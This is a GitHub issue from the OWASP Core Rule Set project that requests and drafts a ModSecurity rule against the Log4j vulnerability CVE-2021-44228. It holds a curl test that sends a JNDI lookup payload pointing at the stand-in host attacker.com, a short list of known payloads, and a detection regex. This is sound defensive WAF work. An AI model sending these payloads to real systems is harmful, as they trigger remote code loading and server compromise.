
Rule against CVE-2021-44228


Motivation

A thread was started in #2330 regarding the Log4J CVE. This issue is to track the request for a specialized rule for it. Currently it is blocked with the following result:

$ curl -H "x-format-output: txt-matched-rules" -H "x-crs-version: 3.3.2" \
--data 'foo=${jndi:ldap://attacker.com/a}' \
https://sandbox.coreruleset.org/
932130 PL1 Remote Command Execution: Unix Shell Expression Found
949110 PL1 Inbound Anomaly Score Exceeded (Total Score: 5)

Proposed solution

Maybe create a specific rule to block log4j Formatting Type payloads

Alternatives

Additional context

Known Payloads:

${java:vm}
${jndi:ldap://attacker.com/a}

https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps
https://www.techtimes.com/articles/269208/20211210/minecraft-vulnerability-spotted-how-to-fix-log4j-bug.htm
https://www.cve.org/CVERecord?id=CVE-2021-44228

Issue Analytics

  • State: closed
  • Created 2 years ago
  • Reactions: 4
  • Comments: 39 (27 by maintainers)

Top GitHub Comments

9 reactions
dune73 commented, Dec 13, 2021

New blog post about CRS and this vulnerability:

https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/

8 reactions
dune73 commented, Dec 10, 2021

Got this as a contribution from a commercial integrator.

# Note: as contributed, the regex carried a stray "}" after "://", which
# would have required a literal brace at that position and so missed the
# payloads listed above; it is dropped here. ModSecurity also requires a
# numeric rule id, so CVE_202144228 must be replaced with an id from a local
# range before the rule will load.
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
    "@rx \${jndi:(?:ldap|iiop|rmi)://" \
    "id:CVE_202144228,\
    phase:2,\
    block,\
    t:none,t:lowercase,t:urlDecodeUni,\
    multimatch,\
    log,\
    msg:'Remote Command Execution: Log4j CVE-2021-44228',\
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    tag:'application-multi',\
    tag:'language-java',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/137/6',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.x',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"